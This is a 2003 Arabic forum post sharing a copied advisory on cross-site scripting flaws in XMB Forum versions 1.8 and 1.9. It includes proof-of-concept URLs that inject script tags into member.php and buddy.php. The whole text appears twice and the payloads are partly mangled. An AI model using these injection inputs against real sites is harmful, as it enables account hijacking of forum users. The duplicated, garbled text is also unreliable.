ReD_BoY
30-07-2003, 07:44
السلام عليكم
لقيت هذى الثغرة ولكن تحتاج للقليل من من التفكير وأعتقد أن فيها جافا وصفحة ؟ على العموم شوفها وعطونا خبر
سلام
is "a free web-based bulletin board system written in PHP with a
MySQL backend". Multiple cross site scripting vulnerabilities have been found in the XMB Forum, these vulnerabilities would allow attackers to insert malicious HTML and JavaScript code into existing web pages.
Details
Vulnerable systems:
* XMB Forum version 1.8
* XMB Forum version 1.9
Examples:
http://pathto/XMBforum/member.php?action=viewpro&member=admin< script>alert(document.&@#&@#&@#&@#&@#&@#)</script>
http://pathto/XMBforum/buddy.php?action=< script>alert(document.&@#&@#&@#&@#&@#&@#)</script>&buddy=<script >alert(document.&@#&@#&@#&@#&@#&@#)</script>
لقيت هذى الثغرة ولكن تحتاج للقليل من من التفكير وأعتقد أن فيها جافا وصفحة ؟ على العموم شوفها وعطونا خبر
سلام
is "a free web-based bulletin board system written in PHP with a
MySQL backend". Multiple cross site scripting vulnerabilities have been found in the XMB Forum, these vulnerabilities would allow attackers to insert malicious HTML and JavaScript code into existing web pages.
Details
Vulnerable systems:
* XMB Forum version 1.8
* XMB Forum version 1.9
Examples:
http://pathto/XMBforum/member.php?action=viewpro&member=admin< script>alert(document.&@#&@#&@#&@#&@#&@#)</script>
http://pathto/XMBforum/buddy.php?action=< script>alert(document.&@#&@#&@#&@#&@#&@#)</script>&buddy=<script >alert(document.&@#&@#&@#&@#&@#&@#)</script>